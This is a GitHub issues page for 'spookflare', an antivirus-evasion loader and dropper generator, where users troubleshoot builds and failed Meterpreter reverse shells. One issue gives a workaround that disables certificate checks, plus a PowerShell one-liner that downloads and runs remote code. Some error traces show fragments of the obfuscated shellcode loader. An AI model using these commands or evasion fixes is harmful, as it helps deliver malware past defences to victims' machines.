hlldz / spookflare

Loader, dropper generator with multiple features for bypassing client-side and network-side countermeasures.

License: Apache License 2.0

Python 100.00%
av-bypass loader dropper av-evasion endpoint-bypass antivirus-evasion antivirus-testing obfuscation bypass

spookflare's Issues

pip installation issue

When I run pip install -r requirements.txt in Kali Linux I get the following.

image

I also got the same error for textwrap

Compile C# in Kali (Debian)?

Hello, can you assist with compiling the .cs files using some Linux variant? I think it can be done using mono as seen here but MonoDevelop crashes when I try importing .cs files. Any ideas?

Error : Powershell and cs loader

Hi,
I tried to generate the loader using option 2, PowerShell and cs loader. I compiled using csc but it gave me this error:

Exception calling "DownloadData" with "1" argument(s): "The server committed a protocol violation.
Section=ResponseStatusLine"
At E:\a.ps1:6 char:258
+ ... ,en;q=0.5");[Byte[]] $SXBQYrXFaTja = $MBmARZhcoqfe."DownloadDat ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Exception calling "Copy" with "5" argument(s): "Value cannot be null.
Parameter name: source"
At E:\a.ps1:6 char:413
+ ... Length - 0);[Array]::Copy($SXBQYrXFaTja, 0, $nUUuHCSJJEek, 0, ($SXBQY ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException

Exception calling "Copy" with "4" argument(s): "Value cannot be null.
Parameter name: destination"
At E:\a.ps1:6 char:691
+ ... x3000,0x40);[Runtime.InteropServices.Marshal]::Copy($nUUuHCSJJEek, 0, ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException

exe has stopped working

The target Windows 10 operating system is x64, and I also used x64 when generating the EXE. An msf connection is established between my Windows device and Kali device, but the EXE crashes almost immediately and the connection is closed.

spook

This time I used the latest available release. But I've noticed the v1.0 interface is a lot different from the latest interface used when I git clone your repository. @hlldz

File "spookflare.py", line 31

I'm having some issues running spookflare in Windows 10. Python is installed and $ pip install -r requirements.txt worked without any errors. What am I doing wrong here?

C:\Users\xajyvi\Desktop\SpookFlare>python spookflare.py
  File "spookflare.py", line 31
	print " \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n"
																									^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(" \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n")?

C:\Users\xajyvi\Desktop\SpookFlare>.\spookflare.py
  File "C:\Users\xajyvi\Desktop\SpookFlare\spookflare.py", line 31
	print " \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n"
																									^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(" \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n")?

Run tool

Hi, I would like to know how to run the tool in the Kali Linux terminal. I tried a few ways but could not execute it; I tried ./SpookFlare.sln but it did not run. What would be the correct procedure?
Thank you.

Work Like the BEEF?

Doesn't it work like BeEF, working on the client side without any download, where most of the victims know that the downloaded files will be malware?
Is there any other implementation, like running in the background of the browser?

Not getting shell

@hlldz
PROTO : https
patched : no

payload used

  1. windows/x64/meterpreter/reverse_https
  2. windows/x64/meterpreter/reverse_winhttps

Compiler

  1. Visual studio 2017
  2. csc

Metasploit version
5.0.22-dev

windows version
windows 10 v1809 (build 17763)

Defender & firewall was off during testing.

Nothing happens after executing .exe file.

Also, can I compile it using Mono on Linux?

Problem With SpookFlare.rc

Hello and congratulations on the great tool.
I'm encountering a problem while operating the tool.
Following the instructional video, I'm not able to find the SpookFlare.rc file.
spookflare_problem

Here is also what I have in the folder:
spookflare_problem2

In the end, I'm getting this error:
spookflare_problem3

Is there a way to fix this? I'll be waiting for an answer, thanks again!

"Newline in constant" error when compiling the C# code

When I try to compile the C# code with csc.exe, I get the following error:

Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,56): error CS1010: Newline in constant
Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected
Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected

SSL/TLS Negotiation Error with Powershell Payload and MSF - FIX/WORKAROUND

So this is a great project! So currently the https ps1 payload will give you the following error: Exception calling "DownloadFile" with "2" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."

You can get around this by placing the following code at the top of the ps1 output file generated by spookflare:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Once you do that you can just call the file from a cmd prompt like so and get your https meterpreter shell: powershell -w 1 -c "iwr('http://x.x.x.x/PS1-OUTPUT.txt')|iex"

Cheers!

SpookFlare [vba/macro] > set CMD

Getting this when I run set CMD:

SpookFlare [vba/macro] > set CMD
Traceback (most recent call last):
File "spookflare.py", line 459, in
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 78, in do_use
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 78, in do_use
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 430, in do_set
vbaCmdFile = line.split()[1]
IndexError: list index out of range

Thanks

cmd window

Why does a cmd window appear and exit?

the exe crashed

Hi,
I compiled the code and ran it on Windows 8 32-bit,
but in the last step, when generating the payload, it crashed.
